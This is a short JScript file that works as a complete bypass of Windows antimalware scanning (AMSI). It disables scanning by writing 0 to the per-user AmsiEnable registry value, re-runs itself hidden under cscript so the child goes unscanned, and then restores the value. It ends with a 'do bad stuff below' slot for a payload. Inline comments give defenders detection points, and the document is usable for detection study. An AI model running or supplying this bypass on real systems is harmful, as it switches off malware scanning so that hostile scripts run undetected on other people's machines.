AMSIEnable Bypass in JScript
// Demonstrates the AmsiEnable registry bypass for Windows Script Host: the
// script flips a per-user registry value, re-launches itself so the child
// runs unscanned, then restores the value. Everything below is reachable
// without elevation because the value lives under HKCU. Detection points
// are noted inline from a defender's perspective.
var sh = new ActiveXObject('WScript.Shell');
// Per-user AMSI switch read by the script engines (0 = disabled). A write of
// 0 to this path is the primary telemetry artefact; registry value-set
// events (e.g. Sysmon Event ID 13) on this key are the simplest hook.
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
var AmsiEnable = sh.RegRead(key);
// A value of 0 means this is already the re-launched child: fall through to
// the payload. Any other value forces control into the catch block.
if(AmsiEnable!=0){
throw new Error(1, '');
}
}catch(e){
// Also entered when the value does not exist yet (RegRead throws).
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
// Re-executes this same file under cscript with an explicit script-engine
// CLSID, hidden window (second arg 0), waiting for exit (third arg 1).
// A cscript.exe child whose command line carries "-e:{CLSID}" plus the
// parent's own ScriptFullName is the second observable; correlate it with
// the registry write above.
sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} "+WScript.ScriptFullName,0,1); // blocking call to Run()
// The value is 0 only for the lifetime of the blocking child, so a point-in-
// time registry audit will usually miss it; rely on event-based telemetry.
sh.RegWrite(key, 1, "REG_DWORD"); // put it back
WScript.Quit(1);
}
// do bad stuff below
sh.Run("cmd.exe /k echo AMSI bypassed :)")